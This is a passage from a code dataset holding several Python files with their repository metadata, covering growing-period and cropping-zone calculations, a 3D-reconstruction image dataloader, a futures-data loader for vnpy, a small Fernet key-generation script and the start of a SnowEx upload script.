        A3 = np.sum( np.logical_and(meanT_diff>0, np.logical_and(meanT_first>=20, meanT_first<25)), axis=2 )
        A2 = np.sum( np.logical_and(meanT_diff>0, np.logical_and(meanT_first>=25, meanT_first<30)), axis=2 )
        A1 = np.sum( np.logical_and(meanT_diff>0, meanT_first>=30), axis=2 )

        B9 = np.sum( np.logical_and(meanT_diff<0, meanT_first<-5), axis=2 )
        B8 = np.sum( np.logical_and(meanT_diff<0, np.logical_and(meanT_first>=-5, meanT_first<0)), axis=2 )
        B7 = np.sum( np.logical_and(meanT_diff<0, np.logical_and(meanT_first>=0, meanT_first<5)), axis=2 )
        B6 = np.sum( np.logical_and(meanT_diff<0, np.logical_and(meanT_first>=5, meanT_first<10)), axis=2 )
        B5 = np.sum( np.logical_and(meanT_diff<0, np.logical_and(meanT_first>=10, meanT_first<15)), axis=2 )
        B4 = np.sum( np.logical_and(meanT_diff<0, np.logical_and(meanT_first>=15, meanT_first<20)), axis=2 )
        B3 = np.sum( np.logical_and(meanT_diff<0, np.logical_and(meanT_first>=20, meanT_first<25)), axis=2 )
        B2 = np.sum( np.logical_and(meanT_diff<0, np.logical_and(meanT_first>=25, meanT_first<30)), axis=2 )
        B1 = np.sum( np.logical_and(meanT_diff<0, meanT_first>=30), axis=2 )

        return [A9,A8,A7,A6,A5,A4,A3,A2,A1,B1,B2,B3,B4,B5,B6,B7,B8,B9]

    def getLGP(self, Sa = 100, pc = 0.5, kc = 1, D = 1):
        """Length of growing period: days where actual ET exceeds half of
        potential ET, based on a simple soil-water bucket model.

        Args:
            Sa: available soil moisture holding capacity (mm/m), scalar or
                a (height, width) array; usually assumed 100.
            pc: soil water depletion fraction below which ETa < ETo.
            kc: crop water requirement factor for the entire growth cycle.
            D: rooting depth (m).
        """
        petc = np.zeros(self.pet_daily.shape)
        peta = np.zeros(self.pet_daily.shape)

        petc = self.pet_daily * 1

        for i_r in range(self.im_height):
            for i_c in range(self.im_width):
                if self.set_mask:
                    if self.im_mask[i_r, i_c] == self.nodata_val:
                        continue

                # Sa may be supplied per-pixel as a 2D grid or as a scalar.
                if len(np.array(Sa).shape) == 2:
                    Sa_temp = Sa[i_r, i_c]
                else:
                    Sa_temp = Sa

                W = 0  # running soil-water store (mm)
                for ii in range(self.pet_daily.shape[-1]):
                    if self.totalPrec_daily[i_r,i_c,ii] >= petc[i_r,i_c,ii]:
                        peta[i_r,i_c,ii] = petc[i_r,i_c,ii]
                    elif self.totalPrec_daily[i_r,i_c,ii] + W >= Sa_temp*D*(1-pc):
                        peta[i_r,i_c,ii] = petc[i_r,i_c,ii]
                    else:
                        # Soil drier than the depletion threshold: scale ETa
                        # down linearly with the available water.
                        kk = (W+self.totalPrec_daily[i_r,i_c,ii]) / (Sa_temp*D*(1-pc))
                        peta[i_r,i_c,ii] = kk * petc[i_r,i_c,ii]

                    W = np.min([W+self.totalPrec_daily[i_r,i_c,ii]-peta[i_r,i_c,ii], Sa_temp*D])
                    if W<0: W=0

        return np.sum( (peta/self.pet_daily)>0.5, axis=2 )

    def getLGP_G_5_and_10(self):
        """Temperature sums (above 5 and 10 degC) restricted to days that
        also belong to the moisture growing period (ETa/ETo > 0.5)."""
        kc = 1  # crop water requirements for entire growth cycle
        Sa = 100  # available soil moisture holding capacity (mm/m)
        D = 1  # rooting depth (m)
        pc = 0.5  # soil water depletion fraction below which ETa < ETo

        petc = np.zeros(self.pet_daily.shape)
        peta = np.zeros(self.pet_daily.shape)

        petc = self.pet_daily * 1

        for i_r in range(self.im_height):
            for i_c in range(self.im_width):
                if self.set_mask:
                    if self.im_mask[i_r, i_c] == self.nodata_val:
                        continue

                W = 0
                for ii in range(self.pet_daily.shape[-1]):
                    if self.totalPrec_daily[i_r,i_c,ii] >= petc[i_r,i_c,ii]:
                        peta[i_r,i_c,ii] = petc[i_r,i_c,ii]
                    elif self.totalPrec_daily[i_r,i_c,ii] + W >= Sa*D*(1-pc):
                        peta[i_r,i_c,ii] = petc[i_r,i_c,ii]
                    else:
                        kk = (W+self.totalPrec_daily[i_r,i_c,ii]) / (Sa*D*(1-pc))
                        peta[i_r,i_c,ii] = kk * petc[i_r,i_c,ii]

                    W = np.min([W+self.totalPrec_daily[i_r,i_c,ii]-peta[i_r,i_c,ii], Sa*D])
                    if W<0: W=0

        # Bug fix: copy before masking — the original zeroed entries of
        # self.meanT_daily in place, corrupting the stored series.
        tempT = self.meanT_daily.copy()
        tempT[np.logical_and(tempT<5, (peta/self.pet_daily)<=0.5)] = 0
        ts_g_t5 = np.sum(tempT, axis=2)

        tempT = self.meanT_daily.copy()
        tempT[np.logical_and(tempT<10, (peta/self.pet_daily)<=0.5)] = 0
        ts_g_t10 = np.sum(tempT, axis=2)

        return [ts_g_t5, ts_g_t10]

    def getLGPClassified(self, lgp):
        """Bin a growing-period-length grid into seven aridity classes
        (1=hyper-arid ... 7=per-humid)."""
        lgp_class = np.zeros(lgp.shape)

        lgp_class[lgp>=365] = 7  # Per-humid
        lgp_class[np.logical_and(lgp>=270, lgp<365)] = 6  # Humid
        lgp_class[np.logical_and(lgp>=180, lgp<270)] = 5  # Sub-humid
        lgp_class[np.logical_and(lgp>=120, lgp<180)] = 4  # Moist semi-arid
        lgp_class[np.logical_and(lgp>=60, lgp<120)] = 3  # Dry semi-arid
        lgp_class[np.logical_and(lgp>0, lgp<60)] = 2  # Arid
        lgp_class[lgp<=0] = 1  # Hyper-arid

        return lgp_class

    def getLGPEquivalent(self):
        """Equivalent growing-period length estimated from the annual
        P/PET moisture index via an empirical quadratic fit."""
        moisture_index = np.sum(self.totalPrec_daily, axis=2)/np.sum(self.pet_daily, axis=2)
        lgp_equv = 14.0 + 293.66*moisture_index - 61.25*moisture_index*moisture_index
        # The quadratic peaks around MI ~ 2.4; clamp to a full year beyond it.
        lgp_equv[ moisture_index > 2.4 ] = 366
        return lgp_equv

    def getMultiCroppingZones(self, t_climate, lgp, lgp_t5, lgp_t10, ts_t0, ts_t10):
        """Delineate multiple-cropping zones (values 2-8) from thermal
        climate, growing-period lengths and temperature sums.

        Tropical climates (t_climate 1-2) and the remaining climates
        (3-8) use separate threshold tables.
        """
        ts_g_t5_and_10 = self.getLGP_G_5_and_10()
        ts_g_t5 = ts_g_t5_and_10[0]
        ts_g_t10 = ts_g_t5_and_10[1]

        multi_cropping = np.zeros(lgp.shape)

        # Thresholds for tropical climates.
        zone_B = np.all([lgp>=45, lgp_t5>=120, lgp_t10>=90, ts_t0>=1600, ts_t10>=1200], axis=0)
        zone_C1 = np.all([lgp>=220, lgp_t5>=220, lgp_t10>=120, ts_t0>=5500, ts_g_t5>=3200, ts_g_t10>=2700], axis=0)
        #zone_C2 = np.all([lgp>=200, lgp_t5>=210, lgp_t10>=120, ts_t0>=6400, ts_g_t5>=3200, ts_g_t10>=2700], axis=0)
        zone_C3 = np.all([lgp>=180, lgp_t5>=200, lgp_t10>=120, ts_t0>=7200, ts_g_t5>=3200, ts_g_t10>=2700], axis=0)
        zone_D1 = np.all([lgp>=270, lgp_t5>=270, lgp_t10>=165, ts_t0>=5500, ts_g_t5>=4000, ts_g_t10>=3200], axis=0)
        #zone_D2 = np.all([lgp>=240, lgp_t5>=240, lgp_t10>=165, ts_t0>=6400, ts_g_t5>=4000, ts_g_t10>=3200], axis=0)
        zone_D3 = np.all([lgp>=210, lgp_t5>=240, lgp_t10>=165, ts_t0>=7200, ts_g_t5>=4000, ts_g_t10>=3200], axis=0)
        zone_F = np.all([lgp>=300, lgp_t5>=300, lgp_t10>=240, ts_t0>=7200, ts_t10>=7000, ts_g_t5>=5100, ts_g_t10>=4800], axis=0)
        zone_H = np.all([lgp>=360, lgp_t5>=360, lgp_t10>=330, ts_t0>=7200, ts_t10>=7000], axis=0)

        multi_cropping[np.all([zone_B,t_climate<=2], axis=0)] = 2
        multi_cropping[np.all([zone_C1,t_climate==1], axis=0)] = 3
        multi_cropping[np.all([zone_C3,t_climate==2], axis=0)] = 3
        multi_cropping[np.all([zone_D1,t_climate==1], axis=0)] = 4
        multi_cropping[np.all([zone_D3,t_climate==2], axis=0)] = 4
        multi_cropping[np.all([zone_F,t_climate<=2], axis=0)] = 6
        multi_cropping[np.all([zone_H,t_climate<=2], axis=0)] = 8

        # Thresholds for non-tropical climates (t_climate 3-8).
        zone_B = np.all([lgp>=45, lgp_t5>=120, lgp_t10>=90, ts_t0>=1600, ts_t10>=1200], axis=0)
        zone_C = np.all([lgp>=180, lgp_t5>=200, lgp_t10>=120, ts_t0>=3600, ts_t10>=3000, ts_g_t5>=3200, ts_g_t10>=2700], axis=0)
        zone_D = np.all([lgp>=210, lgp_t5>=240, lgp_t10>=165, ts_t0>=4500, ts_t10>=3600, ts_g_t5>=4000, ts_g_t10>=3200], axis=0)
        zone_E = np.all([lgp>=240, lgp_t5>=270, lgp_t10>=180, ts_t0>=4800, ts_t10>=4500, ts_g_t5>=4300, ts_g_t10>=4000], axis=0)
        zone_F = np.all([lgp>=300, lgp_t5>=300, lgp_t10>=240, ts_t0>=5400, ts_t10>=5100, ts_g_t5>=5100, ts_g_t10>=4800], axis=0)
        zone_G = np.all([lgp>=330, lgp_t5>=330, lgp_t10>=270, ts_t0>=5700, ts_t10>=5500], axis=0)
        zone_H = np.all([lgp>=360, lgp_t5>=360, lgp_t10>=330, ts_t0>=7200, ts_t10>=7000], axis=0)

        multi_cropping[np.all([zone_B,t_climate>=3,t_climate<=8], axis=0)] = 2
        multi_cropping[np.all([zone_C,t_climate>=3,t_climate<=8], axis=0)] = 3
        multi_cropping[np.all([zone_D,t_climate>=3,t_climate<=8], axis=0)] = 4
        multi_cropping[np.all([zone_E,t_climate>=3,t_climate<=8], axis=0)] = 5
        multi_cropping[np.all([zone_F,t_climate>=3,t_climate<=8], axis=0)] = 6
        multi_cropping[np.all([zone_G,t_climate>=3,t_climate<=8], axis=0)] = 7
        multi_cropping[np.all([zone_H,t_climate>=3,t_climate<=8], axis=0)] = 8

        return multi_cropping
| 50.780911 | 177 | 0.559334 |
acfb43dfb3dc6ef74eabdbdfe48a723aa37410b3 | 17,042 | py | Python | dataloading/dataloading.py | tranphong1991/unisurf | 8e4755c7526a8e7a964a59d1cc307976b1ba6d78 | [
"MIT"
] | 165 | 2021-09-08T07:25:00.000Z | 2022-03-30T15:49:42.000Z | dataloading/dataloading.py | tranphong1991/unisurf | 8e4755c7526a8e7a964a59d1cc307976b1ba6d78 | [
"MIT"
] | 12 | 2021-10-14T13:37:43.000Z | 2022-03-25T05:08:48.000Z | dataloading/dataloading.py | tranphong1991/unisurf | 8e4755c7526a8e7a964a59d1cc307976b1ba6d78 | [
"MIT"
] | 10 | 2021-10-21T02:36:46.000Z | 2022-03-30T08:06:15.000Z | import os
import glob
import random
import logging
import torch
from torch.utils import data
from PIL import Image
import numpy as np
import yaml
from torchvision import transforms
from multiprocessing import Manager
logger = logging.getLogger(__name__)
## Adapted from DVR
def get_dataloader(cfg, mode='train', spilt_model_for_images=True,
                   shuffle=True, with_mask=False):
    ''' Build and return a DataLoader over the image dataset from cfg.

    Args:
        cfg (dict): imported config for dataloading
        mode (str): whether data loading is used for train or test
        spilt_model_for_images (bool): as name
        shuffle (bool): as name
        with_mask (bool): as name
    '''
    dl_cfg = cfg['dataloading']

    # Data fields (images, cameras, optional masks) for the requested mode.
    fields = get_data_fields(cfg, mode, with_mask=with_mask)
    return_idx = False
    if return_idx:
        fields['idx'] = data.IndexField()

    # One managed dict is shared with the dataset for cross-worker caching.
    cache_manager = Manager()
    cache_dict = cache_manager.dict()
    dataset = Shapes3dDataset(
        dl_cfg['path'], fields, split=mode,
        categories=dl_cfg['classes'],
        shared_dict=cache_dict,
        n_views=dl_cfg['n_views'],
        cache_fields=dl_cfg['cache_fields'],
        split_model_for_images=spilt_model_for_images)

    return torch.utils.data.DataLoader(
        dataset, batch_size=dl_cfg['batchsize'],
        num_workers=dl_cfg['n_workers'],
        shuffle=shuffle, collate_fn=collate_remove_none,
    )
def get_data_fields(cfg, mode='train', with_mask=False):
    ''' Returns the data fields.

    Args:
        cfg (dict): imported yaml config
        mode (str): the mode which is used

    Return:
        field (dict): datafield
    '''
    dl_cfg = cfg['dataloading']
    resize_img_transform = ResizeImage(dl_cfg['img_size'])
    fields = {}

    if mode not in ('train', 'val', 'render', 'test'):
        return fields

    fields['img'] = ImagesField(
        'image',
        mask_folder_name='mask',
        transform=resize_img_transform,
        extension='png',
        mask_extension='png',
        with_camera=True,
        with_mask=with_mask,
        # Views are sampled randomly only during training.
        random_view=(mode == 'train'),
        dataset_name='DTU',
        # Rendering consumes every view of each model.
        all_images=(mode == 'render'),
        n_views=dl_cfg['n_views'],
        ignore_image_idx=dl_cfg['ignore_image_idx'],
    )
    return fields
class ResizeImage(object):
    ''' Resize image transformation class.

    It resizes an image and transforms it to a PyTorch tensor.

    Args:
        img_size (int or tuple): resized image size; None keeps the
            original resolution
    '''

    def __init__(self, img_size):
        steps = []
        if img_size is not None:
            steps.append(transforms.Resize(img_size))
        steps.append(transforms.ToTensor())
        self.transform = transforms.Compose(steps)

    def __call__(self, img):
        # Apply resize (if configured) and tensor conversion.
        return self.transform(img)
class Shapes3dDataset(data.Dataset):
'''Dataset class for image data of one 3D shape
Dataset class that includes caching
'''
def __init__(self, dataset_folder, fields, split=None,
categories=None, no_except=True, transform=None,
shared_dict={}, n_views=24, cache_fields=False,
split_model_for_images=False):
''' Initialization of the the 3D shape dataset.
Args:
dataset_folder (str): dataset folder
fields (dict): dictionary of fields
split (str): which split is used
categories (list): list of categories to use
no_except (bool): no exception
transform (callable): transformation applied to data points
shared_dict (dict): shared dictionary (used for field caching)
n_views (int): number of views (only relevant when using field
caching)
cache_fields(bool): whether to cache fields; this option can be
useful for small overfitting experiments
split_model_for_images (bool): whether to split a model by its
views
'''
# Attributes
self.dataset_folder = dataset_folder
self.fields = fields
self.no_except = no_except
self.transform = transform
self.cache_fields = cache_fields
self.n_views = n_views
self.cached_fields = shared_dict
self.split_model_for_images = split_model_for_images
if split_model_for_images:
assert(n_views > 0)
print('You are splitting the models by images. Make sure that you entered the correct number of views.')
# If categories is None, use all subfolders
if categories is None:
categories = os.listdir(dataset_folder)
categories = [c for c in categories
if os.path.isdir(os.path.join(dataset_folder, c))]
categories.sort()
# Read metadata file
metadata_file = os.path.join(dataset_folder, 'metadata.yaml')
if os.path.exists(metadata_file):
with open(metadata_file, 'r') as f:
self.metadata = yaml.load(f)
else:
self.metadata = {
c: {'id': c, 'name': 'n/a'} for c in categories
}
# Set index
for c_idx, c in enumerate(categories):
self.metadata[c]['idx'] = c_idx
# Get all models
self.models = []
for c_idx, c in enumerate(categories):
subpath = os.path.join(dataset_folder, c)
if not os.path.isdir(subpath):
logger.warning('Category %s does not exist in dataset.' % c)
split_file = os.path.join(subpath, str(split) + '.lst')
if not os.path.exists(split_file):
models_c = [f for f in os.listdir(
subpath) if os.path.isdir(os.path.join(subpath, f))]
else:
with open(split_file, 'r') as f:
models_c = f.read().split('\n')
models_c = list(filter(lambda x: len(x) > 0, models_c))
if split_model_for_images:
for m in models_c:
for i in range(n_views):
self.models += [
{'category': c, 'model': m,
'category_id': c_idx, 'image_id': i}
]
else:
self.models += [
{'category': c, 'model': m, 'category_id': c_idx}
for m in models_c
]
def __len__(self):
''' Returns the length of the dataset.
'''
return len(self.models)
    def __getitem__(self, idx):
        ''' Returns an item of the dataset.

        Loads every registered field for the model at index idx and
        merges the results into a single dict. Dict-valued fields are
        flattened using "<field>.<key>" keys; a None key maps to the
        field name itself.

        Args:
            idx (int): ID of data point
        '''
        category = self.models[idx]['category']
        model = self.models[idx]['model']
        c_idx = self.metadata[category]['idx']
        model_path = os.path.join(self.dataset_folder, category, model)
        data = {}
        for field_name, field in self.fields.items():
            try:
                if self.cache_fields:
                    # Pick the view to load: fixed per-sample when the
                    # model is split by images, otherwise random.
                    if self.split_model_for_images:
                        idx_img = self.models[idx]['image_id']
                    else:
                        idx_img = np.random.randint(0, self.n_views)
                    # Cache key is unique per (model, field, view).
                    k = '%s_%s_%d' % (model_path, field_name, idx_img)
                    if k in self.cached_fields:
                        field_data = self.cached_fields[k]
                        #print(k)
                    else:
                        field_data = field.load(model_path, idx, c_idx,
                                                input_idx_img=idx_img)
                        self.cached_fields[k] = field_data
                        #print('Not cached %s' %k)
                else:
                    if self.split_model_for_images:
                        idx_img = self.models[idx]['image_id']
                        field_data = field.load(
                            model_path, idx, c_idx, idx_img)
                    else:
                        field_data = field.load(model_path, idx, c_idx)
            except Exception:
                # With no_except, a broken sample yields None so the
                # collate function can drop it instead of crashing.
                if self.no_except:
                    logger.warn(
                        'Error occurred when loading field %s of model %s (%s)'
                        % (field_name, model, category)
                    )
                    return None
                else:
                    raise
            # Flatten dict-valued fields into namespaced keys.
            if isinstance(field_data, dict):
                for k, v in field_data.items():
                    if k is None:
                        data[field_name] = v
                    else:
                        data['%s.%s' % (field_name, k)] = v
            else:
                data[field_name] = field_data
        if self.transform is not None:
            data = self.transform(data)
        return data
def get_model_dict(self, idx):
return self.models[idx]
def collate_remove_none(batch):
    ''' Collater that puts each data field into a tensor with outer dimension
    batch size, after dropping samples that failed to load (None entries).

    Args:
        batch: batch
    '''
    valid_samples = [sample for sample in batch if sample is not None]
    return data.dataloader.default_collate(valid_samples)
def worker_init_fn(worker_id):
    ''' Worker init function to ensure true randomness.

    Seeds numpy's global RNG from the OS entropy pool, offset by the
    worker id so each dataloader worker draws a distinct random stream.

    Args:
        worker_id (int): id of the dataloader worker
    '''
    random_data = os.urandom(4)
    base_seed = int.from_bytes(random_data, byteorder="big")
    # np.random.seed only accepts values in [0, 2**32 - 1]; without the
    # modulo, base_seed + worker_id could overflow that range and raise
    # a ValueError for seeds drawn near the maximum.
    np.random.seed((base_seed + worker_id) % (2 ** 32))
class ImagesField(object):
    ''' Data field for images, masks and cameras.

    Args:
        folder_name (str): folder containing the rendered images
        mask_folder_name (str): folder containing the object masks
        transform: optional transform applied to every loaded image
        extension (str): image file extension
        mask_extension (str): mask file extension
        with_camera (bool): whether to load camera matrices
        with_mask (bool): whether to load and apply the object mask
        random_view (bool): whether to pick a random view per sample
        all_images (bool): whether to return all views of a model
        n_views (int): if > 0, restrict the number of usable views
        ignore_image_idx (list): image indices that should be skipped
    '''
    def __init__(self, folder_name, mask_folder_name='mask',
                 transform=None, extension='png', mask_extension='png',
                 with_camera=False, with_mask=False,
                 random_view=True, all_images=False, n_views=0,
                 ignore_image_idx=None, **kwargs):
        self.folder_name = folder_name
        self.mask_folder_name = mask_folder_name
        self.transform = transform
        self.extension = extension
        self.mask_extension = mask_extension
        self.random_view = random_view
        self.n_views = n_views
        self.with_camera = with_camera
        self.with_mask = with_mask
        self.all_images = all_images
        # A mutable default argument ([]) would be shared between every
        # instance; use None as sentinel and create a fresh list instead.
        self.ignore_image_idx = [] if ignore_image_idx is None else ignore_image_idx

    def load(self, model_path, idx, category, input_idx_img=None):
        ''' Loads the field.

        Args:
            model_path (str): path to model
            idx (int): model id
            category (int): category id
            input_idx_img (int): image id which should be used (this
                overwrites any other id). This is used when the fields are
                cached.
        '''
        if self.all_images:
            # Return one entry per view plus the total view count.
            n_files = self.get_number_files(model_path)
            data = {}
            for input_idx_img in range(n_files):
                datai = self.load_field(model_path, idx, category,
                                        input_idx_img)
                data['img%d' % input_idx_img] = datai
            data['n_images'] = n_files
            return data
        else:
            return self.load_field(model_path, idx, category, input_idx_img)

    def get_number_files(self, model_path, ignore_filtering=False):
        ''' Returns how many views are present for the model.

        Args:
            model_path (str): path to model
            ignore_filtering (bool): whether the image filtering
                (ignore_image_idx / n_views) should be ignored
        '''
        folder = os.path.join(model_path, self.folder_name)
        files = glob.glob(os.path.join(folder, '*.%s' % self.extension))
        files.sort()

        if not ignore_filtering and len(self.ignore_image_idx) > 0:
            files = [files[i] for i in range(len(files))
                     if i not in self.ignore_image_idx]
        if not ignore_filtering and self.n_views > 0:
            files = files[:self.n_views]
        return len(files)

    def return_idx_filename(self, model_path, folder_name, extension, idx):
        ''' Loads the "idx" filename from the folder.

        Args:
            model_path (str): path to model
            folder_name (str): name of the folder
            extension (str): string of the extension
            idx (int): ID of data point
        '''
        folder = os.path.join(model_path, folder_name)
        files = glob.glob(os.path.join(folder, '*.%s' % extension))
        files.sort()

        if len(self.ignore_image_idx) > 0:
            files = [files[i] for i in range(len(files))
                     if i not in self.ignore_image_idx]
        if self.n_views > 0:
            files = files[:self.n_views]
        return files[idx]

    def load_image(self, model_path, idx, data=None):
        ''' Loads an image (stored under the None key of data).

        Args:
            model_path (str): path to model
            idx (int): ID of data point
            data (dict): data dictionary to fill; created when omitted

        Returns:
            dict: the (possibly newly created) data dictionary
        '''
        if data is None:
            # Fixed: the old mutable default ({}) was shared across calls
            # and leaked data between samples.
            data = {}
        filename = self.return_idx_filename(model_path, self.folder_name,
                                            self.extension, idx)
        image = Image.open(filename).convert("RGB")
        if self.transform is not None:
            image = self.transform(image)
        if self.with_mask:
            filename_m = self.return_idx_filename(
                model_path, self.mask_folder_name, self.mask_extension, idx)
            # np.bool was removed in NumPy 1.24; the builtin bool is the
            # documented replacement.
            mask = np.array(Image.open(filename_m)).astype(bool)
            mask = mask.reshape(mask.shape[0], mask.shape[1], -1)
            mask = mask[:, :, 0]
            mask = mask.astype(np.float32)
            # Paint the region outside the mask white.
            image = image * mask + (1 - mask) * np.ones_like(image)
        data[None] = image
        data['idx'] = idx
        return data

    def load_camera(self, model_path, idx, data=None):
        ''' Loads the camera matrices (world/camera/scale) into data.

        Args:
            model_path (str): path to model
            idx (int): ID of data point
            data (dict): data dictionary to fill; created when omitted

        Returns:
            dict: the (possibly newly created) data dictionary
        '''
        if data is None:
            data = {}
        if len(self.ignore_image_idx) > 0:
            # Map the filtered view index back to the original image index
            # so that the correct entry of cameras.npz is read.
            n_files = self.get_number_files(model_path, ignore_filtering=True)
            idx_list = [i for i in range(n_files)
                        if i not in self.ignore_image_idx]
            idx_list.sort()
            idx = idx_list[idx]

        camera_file = os.path.join(model_path, 'cameras.npz')
        camera_dict = np.load(camera_file)
        Rt = camera_dict['world_mat_%s' % idx].astype(np.float32)
        K = camera_dict['camera_mat_%s' % idx].astype(np.float32)
        # scale_mat is optional; fall back to identity.
        S = camera_dict.get(
            'scale_mat_%s' % idx, np.eye(4)).astype(np.float32)
        data['world_mat'] = Rt
        data['camera_mat'] = K
        data['scale_mat'] = S
        return data

    def load_mask(self, model_path, idx, data=None):
        ''' Loads an object mask into data.

        Args:
            model_path (str): path to model
            idx (int): ID of data point
            data (dict): data dictionary to fill; created when omitted

        Returns:
            dict: the (possibly newly created) data dictionary
        '''
        if data is None:
            data = {}
        filename = self.return_idx_filename(
            model_path, self.mask_folder_name, self.mask_extension, idx)
        mask = np.array(Image.open(filename)).astype(bool)
        mask = mask.reshape(mask.shape[0], mask.shape[1], -1)[:, :, 0]
        data['mask'] = mask.astype(np.float32)
        return data

    def load_field(self, model_path, idx, category, input_idx_img=None):
        ''' Loads the data point.

        Args:
            model_path (str): path to model
            idx (int): ID of data point
            category (int): index of category
            input_idx_img (int): image id which should be used (this
                overwrites any other id). This is used when the fields are
                cached.
        '''
        if input_idx_img is not None:
            idx_img = input_idx_img
        elif self.random_view:
            n_files = self.get_number_files(model_path)
            idx_img = random.randint(0, n_files - 1)
        else:
            idx_img = 0

        # Load the data
        data = {}
        self.load_image(model_path, idx_img, data)
        if self.with_camera:
            self.load_camera(model_path, idx_img, data)
        if self.with_mask:
            self.load_mask(model_path, idx_img, data)
        return data

    def check_complete(self, files):
        ''' Checks if the field is complete, i.e. the image folder exists.

        Args:
            files: file/folder names present in the model folder
        '''
        complete = (self.folder_name in files)
        return complete
acfb4451601142ef1d3625aad811ee21a9d386f3 | 6,028 | py | Python | vnpy/app/pytdx_loader/engine.py | zskycode/vnpy | 441de3ede2e3001661dfc030c8cbe1c860257f56 | [
"MIT"
] | null | null | null | vnpy/app/pytdx_loader/engine.py | zskycode/vnpy | 441de3ede2e3001661dfc030c8cbe1c860257f56 | [
"MIT"
] | null | null | null | vnpy/app/pytdx_loader/engine.py | zskycode/vnpy | 441de3ede2e3001661dfc030c8cbe1c860257f56 | [
"MIT"
] | null | null | null | import time
import pandas as pd
from datetime import datetime
from vnpy.app.pytdx_loader.my_pytdx.constant import KBarType, FutureMarketCode
from vnpy.app.pytdx_loader.my_pytdx.extension_api import ExhqAPI
from vnpy.app.pytdx_loader.my_pytdx.ips import IPsSource
from vnpy.event import EventEngine
from vnpy.trader.constant import Exchange, Interval
from vnpy.trader.database import get_database
from vnpy.trader.engine import BaseEngine, MainEngine
from vnpy.trader.object import BarData
from vnpy.trader.utility import get_folder_path
APP_NAME = "PytdxLoader"
class PytdxLoaderEngine(BaseEngine):
""""""
def __init__(self, main_engine: MainEngine, event_engine: EventEngine):
""""""
super().__init__(main_engine, event_engine, APP_NAME)
self.file_path: str = ""
self.symbol: str = ""
self.exchange: Exchange = Exchange.SSE
self.interval: Interval = Interval.MINUTE
self.datetime_head: str = ""
self.open_head: str = ""
self.close_head: str = ""
self.low_head: str = ""
self.high_head: str = ""
self.volume_head: str = ""
def to_bar_data(self, item,
symbol: str,
exchange: Exchange,
interval: Interval,
datetime_head: str,
open_head: str,
high_head: str,
low_head: str,
close_head: str,
volume_head: str,
open_interest_head: str
):
bar = BarData(
symbol=symbol,
exchange=exchange,
datetime=item[datetime_head].to_pydatetime(),
interval=interval,
volume=item[volume_head],
open_interest=item[open_interest_head],
open_price=item[open_head],
high_price=item[high_head],
low_price=item[low_head],
close_price=item[close_head],
gateway_name="DB"
)
return bar
def load_by_handle(
self,
data,
symbol: str,
exchange: Exchange,
interval: Interval,
datetime_head: str,
open_head: str,
high_head: str,
low_head: str,
close_head: str,
volume_head: str,
open_interest_head: str,
datetime_format: str,
progress_bar_dict:dict,
opt_str: str
):
start_time = time.time()
if isinstance(data[datetime_head][0], str):
data[datetime_head] = data[datetime_head].apply(
lambda x: datetime.strptime(x, datetime_format) if datetime_format else datetime.fromisoformat(x))
elif isinstance(data[datetime_head][0], pd.Timestamp):
self.main_engine.write_log("datetime 格式为 pd.Timestamp, 不用处理.")
else:
self.main_engine.write_log("未知datetime类型, 请检查")
self.main_engine.write_log(f'df apply 处理日期时间 cost {time.time() - start_time:.2f}s')
if opt_str == "to_db":
start_time = time.time()
bars = data.apply(
self.to_bar_data,
args=(
symbol,
exchange,
interval,
datetime_head,
open_head,
high_head,
low_head,
close_head,
volume_head,
open_interest_head
),
axis=1).tolist()
self.main_engine.write_log(f'df apply 处理bars时间 cost {time.time() - start_time:.2f}s')
# insert into database
get_database().save_bar_data(bars, progress_bar_dict)
elif opt_str == "to_csv":
csv_file_dir = get_folder_path("csv_files")
data.to_csv(f'{csv_file_dir}/{exchange.value}_{symbol}.csv', index=False)
start = data[datetime_head].iloc[0]
end = data[datetime_head].iloc[-1]
count = len(data)
return start, end, count
def load(
self,
symbol: str,
exchange: Exchange,
interval: Interval,
datetime_head: str,
open_head: str,
high_head: str,
low_head: str,
close_head: str,
volume_head: str,
open_interest_head: str,
datetime_format: str,
progress_bar_dict: dict,
opt_str: str,
):
"""
load by filename %m/%d/%Y
"""
# data = pd.read_csv(file_path)
ip, port = IPsSource().get_fast_exhq_ip()
ex_api = ExhqAPI()
with ex_api.connect(ip, port):
params_dict = {
"category": KBarType[interval.name].value,
"market": FutureMarketCode[exchange.value].value,
"code": symbol,
}
data_df = ex_api.get_all_KBars_df(**params_dict)
# transform column name to vnpy format
data_df.rename(
columns={
"datetime": "Datetime",
"open": "Open",
"high": "High",
"low": "Low",
"close": "Close",
"position": "OpenInterest",
"trade": "Volume",
},
inplace=True
)
return self.load_by_handle(
data_df,
symbol=symbol,
exchange=exchange,
interval=interval,
datetime_head=datetime_head,
open_head=open_head,
high_head=high_head,
low_head=low_head,
close_head=close_head,
volume_head=volume_head,
open_interest_head=open_interest_head,
datetime_format=datetime_format,
progress_bar_dict=progress_bar_dict,
opt_str=opt_str
) | 32.408602 | 114 | 0.532349 |
acfb4467bf15ad794b3109752cb411ab3fe44815 | 145 | py | Python | Cryptography/GenerateKey.py | DEV-UNT/Advanced-Keylogger | f17023bf139a81fa49f12528cc5b080d40b1775d | [
"Apache-2.0"
] | 1 | 2021-06-07T13:15:51.000Z | 2021-06-07T13:15:51.000Z | Cryptography/GenerateKey.py | DEV-UNT/Advanced-Keylogger | f17023bf139a81fa49f12528cc5b080d40b1775d | [
"Apache-2.0"
] | null | null | null | Cryptography/GenerateKey.py | DEV-UNT/Advanced-Keylogger | f17023bf139a81fa49f12528cc5b080d40b1775d | [
"Apache-2.0"
] | 2 | 2021-06-07T13:15:53.000Z | 2021-06-25T22:15:15.000Z | from cryptography.fernet import Fernet
key = Fernet.generate_key()
file = open("encryption_key.txt", 'wb')
file.write(key)
file.close()
| 18.125 | 40 | 0.710345 |
acfb44954393481a12e54cdc363ea4ef0d1bb13f | 1,841 | py | Python | scripts/upload/add_gm_snow_off.py | SnowEx/snowexsql | 77b89c617ecbd6433c25a7c6eb11f1df25766f0d | [
"BSD-3-Clause"
] | 5 | 2021-05-06T20:57:13.000Z | 2021-11-15T18:04:33.000Z | scripts/upload/add_gm_snow_off.py | SnowEx/snowexsql | 77b89c617ecbd6433c25a7c6eb11f1df25766f0d | [
"BSD-3-Clause"
] | 28 | 2021-05-15T12:30:23.000Z | 2022-02-25T00:07:28.000Z | scripts/upload/add_gm_snow_off.py | hpmarshall/SnowEx2020_SQLcode | 77b89c617ecbd6433c25a7c6eb11f1df25766f0d | [
"BSD-3-Clause"
] | 2 | 2021-05-02T00:46:26.000Z | 2021-05-03T16:35:39.000Z | """
1. To download the data, run sh download_snow_off.sh
2. Run this script.
Usage:
# To run with all the scripts
